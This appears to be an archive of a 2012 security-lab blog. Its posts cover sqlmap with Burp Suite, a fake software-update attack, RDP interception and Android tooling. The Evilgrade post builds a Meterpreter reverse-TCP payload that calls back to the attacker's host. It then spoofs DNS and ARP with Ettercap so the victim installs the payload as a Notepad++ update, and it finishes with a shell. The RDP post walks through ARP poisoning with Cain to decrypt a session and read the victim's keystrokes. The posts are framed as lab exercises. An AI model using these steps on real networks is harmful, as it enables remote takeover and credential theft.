Thursday, September 6, 2012

MySQLDumper Exploit




------------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

Wednesday, September 5, 2012

Sqlmap plugin for BurpSuite

Download SQLmap plugin for Brupsuite at: http://code.google.com/p/gason/downloads/list
1 - Store it in the same folder brupsuite
2 - Use this command to start brupsuite with plugin: ( on Linux)
java -classpath gason-0.9.5.:"burpsuite_v1.4.01.jar" burp.StartBurp
3 - On start, when you click proxy tab/ action, you will see send to sqlmap

Config web browser use brupsuite proxy. Now, you can use it


1 - Request from browser to brupsuite
2 - Action/ Send to SQLmap

On SQLmap option, you must:
1 - Config SQLmap bin path
2 - Action
3 - Option if you need, then run

And this is result:
------------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

Sunday, September 2, 2012

Software Update MITM Exploit use Evilgrage and Ettercap

Many software check for updates, sometime updates are preformed over SSL. Commonly, updates are delivered over HTTP, which can be manipulated
Modular exploit tool to spoof Software Update Responses, to delivers executable of your choosing to the victim. In this lab, i used Evilgrade with Ettercap

Your victim machine use Notepad++ unstable:
1 - Unstable version
2 - Victim IP and DNS
Install Evilgrade on Backtrack system:
1 - # cd /root
2 - # apt-get install libdata-dump-perl
3 - # wget http://isr-evilgrade.googlecode.com/files/isr-evilgrade-2.0.0.tar.gz
4 - # tar xfz isr-evilgrade-2.0.0.tar.gz
5 - # cd isr-evilgrade
Prepare Metepreter executable to deliver to victim
1 - # ifconfig eth0
Get your Backtrack IP address
2 - # cd /root/isr-evilgrade/agent/
Go to evilgrade agent directory
3 - # /opt/metasploit/msf3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.174.132 LPORT=8080 X > agent.exe
Create metepreter executable
4 - # ls
Verify agent.exe

1 - # /opt/metasploit/msf3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=8080 LHOST=0.0.0.0 E
Start the Meterpreter handler to accept the reverse TCP connection
2 - Leave this command running while we continue the lab

1 - # echo "notepad-plus.sourceforge.net A 192.168.174.132" >> /usr/local/share/ettercap/etter.dns
Add entry to etter.dns to resolve notepad-plus.sourceforge.net
1 - # echo "download.tuxfamily.org A 192.168.174.132" >> /usr/local/share/ettercap/etter.dns
Add entry to etter.dns to resolve download.tuxfamily.org
3 - # gedit /usr/local/share/ettercap/etter.dns
Check your config

Launch Ettercap with ARP MITM attack
1 - # ettercap -Tqm arp:remote /192.168.174.150/ /8.8.8.8,4/
2 - Press "p" to chose plugin

3 - Invoke dns_spoof Ettercap plugin
4 - Test on victim systems

Invoke Evilgrade Notepad++ module
1 - #cd /root/isr-evilgrade
2 - ./evilgrade
3 - evilgrage> conf notepadplus
4 - evilgrage(notepadplush)>start

Note: If your Notepad++ version is higher than 5.8, you must edit Notepad++ module config file
1 - # gedit /root/isr-evilgrade/modules/notepadplus.pm
2 - Change 'vh' => 'notepad-plus.sourceforge.net' to 'vh' => 'download.tuxfamily.org'

On victim system
1 - Run Notepad++, click ? | Update Notepad++
2 - After downloading the update executable, Notepadd++ will prompt the user to install the update, Click "Yes"

Return Meterpreter on Backtrack System
From here you have control over the victim system, try enter Meterpreter command:
1 - sysinfo
2 - shell

------------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

Saturday, September 1, 2012

RDP Man in The Middle

Remote Desktop Protocol ( RDP) is used in most Windows environments. It often vulnerable to man-in-the-middle. You can decrypt session to reveal keystrokes. Today, we will demo this.
Note: Newer RDP version can employ a certificate and TLS encryption, but self-signed certs are often used. And Cain is only tool we know of that can attack RDP ( even with TLS)
We need three systems for yourself:
•    RDP server
•    RDP client ( victim)
•    Attacker ( running Cain on Windows XP)
Note:
•    No security suite ( disable firewall)
•    Note IP address of each
•    Install Cain & Abel, and accept all default except WinPcap
1.    On RDP Server system, create an admin user account:
1 - Create an administrator account
2 – Then add it into Administrators groups
3 – Verify its creation
2.    Enable RDP on RDP server system:
1 - Right click My Computer
2 - Chose Properties
3 – Chose Remote tab
4 – Check “ Allow user to connect remotely to this compute”. Click ok on Confirm Dialog
5 – Click “Apply”
6 – Click “OK”
3.    RDP MitM on Attacker systems
1 – Press the Sniffer button
2 – Select Sniffer tab
3 – Select Host tab
4 – Press the blue + sign
5 – Select the Range radio button
6 – Enter the target IP range
7 – Press OK to perform an ARP scan
Here we see the host on the network at this time. Verify that the client and server are listed here.
We will select the victim client and server to poison:
1 – Select APR tab
2 – Press the blue + sign
3 – Select your taget
4 – Press OK
 When you are ready, press the radioactive symbol button ( 1 ) to initiate ARP cache poison.
4.    Victim connect to the RDP server

1 – Run mstsc to start Remote Desktop Client
2 – Enter RDP IP, click Connect and enter the username and password when prompted
5.    On Attacker system:
1 – Click on APR-RDP to see the session(s)
2 – Right click on the filename and chose View to open decrypt file in Notepad
1 – Select Find from Edit menu in Notepad
2 – Enter “key pressed” as the search term
3 – Press Find Next to move through the decrypt keystroke
6.    Clean up
Remove test account on RDP server
------------------------------------------------------------
Thanks for reading
--------------------------------------------------------------------------
Security Research
All my Lab:
Linux Lab -- window and Cisco Lab
to be continued - I will update more.

Install Xposed Inspector and Frida on Genymotion

Today i had some work with android. So i need trace application. I found 2 nice tool can help me: Xposed Inspector and Frida. To setup ther...